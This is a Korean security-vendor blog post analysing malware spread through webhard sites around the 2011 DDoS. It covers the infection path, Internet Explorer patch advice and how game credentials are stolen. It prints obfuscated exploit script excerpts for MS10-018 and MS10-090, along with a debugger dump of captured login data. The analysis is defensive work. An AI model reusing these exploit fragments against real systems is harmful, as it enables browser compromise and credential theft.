여러분의 웹하드 사이트는 안전한가요?

2011.3.4 DDoS는 일부 웹하드 사이트들에서 배포하는 정상 프로그램이 외부의 공격으로 인해서 악성코드로 교체되어 해당 웹하드를 이용하는 사용자에게 배포되면서 발생한 것이다. 이는 2년전 2009.7.7 DDoS와 비교해 보면 거의 유사하다.

악성코드에 의해서 발생한 두 DDoS의 공통점은 예고되었고 인재(관리소홀)가 아니었을까?란 생각을 해 본다.
그 이유는 주말이면 기대를 저버리지 않고 일부 웹하드 사이트들에서 개인정보 유출형 악성코드를 유포하고 있는 것으로 확인되었기 때문이다.

2011.02 ~ 2011.03.07기간동안 일부 웹하드 사이트들에서 악성코드 유포 목적으로 발생한 침해사고 건수를 산출내 보았다.  법적으로 문제가 발생할 수 있기 때문에 정확한 업체명은 밝히지 않으며 알파벳 순으로 표기하였다.

[그림 1] 웹하드 사이트의 침해건수

악성코드, 어떻게 유포될까?
악성코드가 유포되는 과정은 말로 설명하는 것보다는 아래 그림으로 요약해 볼 수 있겠다.

[그림 2] 악성코드 유포과정

일부 웹하드 사이트에 삽입되었던 페이지를 살펴보면 아래와 같다.

[그림 3] 웹하드 사이트에 삽입된 악성 URL

악성코드, 어떻게 감염될까?
사용자 입장에서 가장 걱정되는 것은 아마 “악성코드를 유포하는 웹하드 사이트 접속하는 것만으로 감염되나요?”일 것이다.

결론부터 말하자면 악성코드에 감염될 조건은 아래 2 가지가 있다.

1. 사용자가 사용하는 브라우저가 Internet Explorer일 경우
2. Internet Explorer에 보안 업데이트가 안되어 있을 경우
[표 1] 사용자의 PC가 악성코드에 감염될 조건

Internet Explorer 8.0 이상 사용하고 보안 업데이트를 꾸준히 했더라도 악성코드를 유포하는 웹하드 사이트에 접속할 경우 악성 스크립트가 사용자의 PC에 다운로드될 수 있다. 하지만 이미 사용자의 브라우저는 보안 업데이트가 적용되어 있기 때문에 해당 브라우저에 취약점이 존재하지 않아 악성 스크립트가 실행되지 않다. 그래서 사용자의 PC는 악성코드에 감염되지 않는다. 다운로드와 실행의 의미를 혼동하지 말기를 바란다.

Internet Explorer에 보안 취약점이 존재하면 악성 스크립트에 의해서 “특정 온라인 게임 사용자의 계정정보”를 유출하는 악성코드가 다운로드 및 실행되며 이를 위해서 가장 많이 사용하는 취약점은 아래와 같다.

-. MS10-018: http://www.microsoft.com/korea/technet/security/bulletin/MS10-018.mspx

function qjwP4()
{
    var sRHjGE4=”#default#userData”;
    var qgSFdrF3 = document.createElement(hCpCFNB8);
    qgSFdrF3.addBehavior(sRHjGE4);
    document.appendChild(qgSFdrF3);
    twPa4='s';
    try
    {
        for (i=0;i<10;i++)
  {
           qgSFdrF3.setAttribute(twPa4,window);
        }
    }
    catch(e)
    {}
    window.status+='';
}
[표 2] MS10-018 취약점 코드
-. MS10-090: http://www.microsoft.com/korea/technet/security/bulletin/MS10-090.mspx

function terju573aktr(){
var EFAOkeEGa56323567=”ea12atcEA6723″;
var KCLFa7lhGXL=new Array();
var ERAkcoaeElkEfa5632567=”atyo56326c5F69798kfl”;
var Fvlgf6t7eoyoa=”@UFP&51″+”0″+”d”+”0″+”d”+”@”+”UFP&51″+”0″+”d”+”0″+”d”;
Fvlgf6t7eoyoa=window[“x75x6ex65x73x63x61x70x65”](Fvlgf6t7eoyoa[“x72x65x70x6cx61x63x65″](/@UFP&51/g,”x25x75”));
var HKL7nhASDa5356ea32Z16578=””;
document.write(““);
var gkocoalke5632657=”FAS56GFAfabgh6″;
}
[표 3] MS10-090 취약점 코드

악성코드, 감염되면 어떤 피해를 입을까?
만약 사용자가 특정 온라인 게임 사용자라면 악성코드에 감염된 PC에서 해당 온라인 게임 사이트에 로그인 할 때 계정정보를 탈취한 후 특정 URL로 전송한다. 그럼 악성코드 제작자는 탈취한 계정정보를 브로커에게 전달하고 브로커는 탈취한 사용자 계정정보를 사용하여 사용자의 게임 사이템을 절취 및 판매하여 금전적 이득을 취하게 된다.
 

[그림 4] 계정정보 탈취방법 및 과정

 
OllyDBG로 사용자가 입력한 계정정보가 HttpSendRequestA()의 인자값으로 전달된 상태를 살펴보면 아래와 같다.

|Arg1 = 00CC000C

|Arg2 = 00195FE0Referer: http://www.[게임사이트].net/”,CR,LF,”Accept-Language: ko”,CR,LF,”Content-Type: application/x-www-form-urlencoded”,CR,LF,”Accept-Encoding: gzip, deflate”

|Arg3 = FFFFFFFF

|Arg4 = 02A97B30  6C,”_id=test1111&l_pwd=test2222&l_domain=www.[게임사이트].net&l_dirurl=0&

                  l_url=http%3A%2F%2Fwww.[게임사이트].net%2F&l_”

|Arg5 = 000000A6

|Arg6 = 00000000

Arg7 = 00000013

[표 4] HttpSendRequestA()의 인자값으로 전달된 계정정보

악성코드는 HttpSendRequestA()의 인자값으로 저장된 정보에서 특정 문자열의 존재여부를 검색하여 계정정보를 추출한다.

[그림 5] 악성코드의 계정정보 탈취방법

에필로그
1. 웹하드 사이트의 관리자에게 한마디
주말이 지나고 한 주의 시작을 알리는 월요일이면 웹하드 사이트의 관리자들로부터 항의성 메일이 접수된다. 자신들의 사이트는 악성코드를 유포하지 않으며 심각한 영업손실이 초래되므로 접속차단을 해제해 달라고….

심각한 영업손실이라, 그럼 그 영업이익이 누구로부터 나온단 말인가? 당연히 고객으로부터 나올 것이다.
근본적인 대책은 강구하지 않고 임시방편(삽입된 악성 URL삭제) 조치와 관리소홀로 인해서 악성코드 URL이 삽입의 되풀이와 이로 인해 웹하드 사이트에 접속하는 고객 PC가 악성코드 감염되어 고객의 애지중지하는 게임 아이템이 사라지면 이건 누가 보상해야하는가?

진정으로 고객을 생각하고 영업이익을 걱정한다면 웹하드 사이트에 주기적으로 삽입되는 악성 URL의 근본적인 해결방법에 대해서 강구해야할 것이다. 만약 그대로 방치한다면 고객으로부터 웹하드 사이트의 신뢰는 떨어질 것이고 결국 영업손실로 이어질 것이다. 고객은 바보가 아니다.

2. 일반 사용자에게 한마디
언제까지 보안 업데이트는 나 몰라라 하면서 악성코드 감염으로 인해서 발생하는 피해를 감수할 것인가?
보안 업데이트의 중요성은 귀에 딱지가 생기도록 여러 경로를 통해서 언급한바 있다.

-. 안철수연구소가 추천하는 보안정보:
http://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsList.do?menu_dist=5

사용자들은 지금의 인터넷 환경에서 편리함만 추구해서는 큰 문제가 발생할 수 있기에 보안도 함께 생각해야 한다는 것 알아야한다. 그리고 보안의 가장 기본이 바로 보안 업데이트라는 점 반드시 알야둬야 한다. 보안을 소홀히 함으로써 발생한 부작용은 언론을 통해서 여러번 보고된바 있다.

-. Windows Update : http://www.update.microsoft.com/windowsupdate/v6/default.aspx?ln=ko

[그림 6] Windows XP에서 보안 업데이트

[그림 7] Windows 7에서 보안 업데이트

3. 안철수연구소를 포함한 보안업체의 고민
하루에도 수십만개의 악성코드가 발견되고 또 소멸되고 있다.
오늘날 악성코드들은 사용자가 판단할 수 없는 교묘한 방법을 사용하여 악성코드를 실행하도록 유도하고 있어 전문가가 아닌 이상 아니 전문가도 한 순간에 방심할 수 있는 상황에서 일반 사용자들은 어떻겠는가?

현재 악성코드는 물량화, 지능화, 조직화등으로 점차 발전해가고 있다. 이는 백신의 시그니처 방식은 이제 한계에 도달했다는 것을 의미하며 이에 대한 대안으로 ASD(AhnLab Smart Defense)같이 좀더 포괄적이면서 빠르게 악성코드에 대응할 수 있는 기술들을 연구해야할 필요성이 있다는 것을 의미한다. 보안업체가 일반 사용자들의 보안 조력자로서 역할을 충실히 실행할 수 있도록….

이 자릴 빌어 이번 2011.3.4 DDoS 대응에 불철주야 고생한 업체관계자 분들께 고맙다는 말을 전하고 싶다.

4. 언론매체에게 한마디

보안업체에 종사하는 한 사람으로써 언론을 통해서 접한 보안이슈를 보면 제목부터가 다소 자극적이라는 느낌을 여러번 받는다. 물론 일반 사용자들에게 경각심을 일깨워 주는 것도 좋지만 반대로 사용자들에게 지나친 불안감을 줄 필요는 없을 것 같다.

5. 국가기관에게 한마디
2년 전 2009.7.7 DDoS때 얻은 교훈으로 이번 2011.3.4 DDoS는  피해를 최소화하면서 악성코드들을 빠르게 소멸시키는데 큰 역할을 했다. 하지만 이번에도 개선할 점은 분명히 있었을 것이다. 이번 2011.3.4 DDoS처럼 국가적으로 이슈가 되는 사건은 앞으로도 빈번히 발생할 수가 있기에 공조체제를 좀더 강화할 필요가 있을 것 같다.

악성코드가 일반 사용자들을 위협하는 것에서 이제는 국가 인프라를 위협하는 수준이다. 어느 한 곳만으로 해결하기에는 역부족일 수 있기에 이럴 때일 수도록 상호간의 공조가 체계적으로 이루어질 필요가 있을 것 같다.

Categories:악성코드 정보

0 0 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments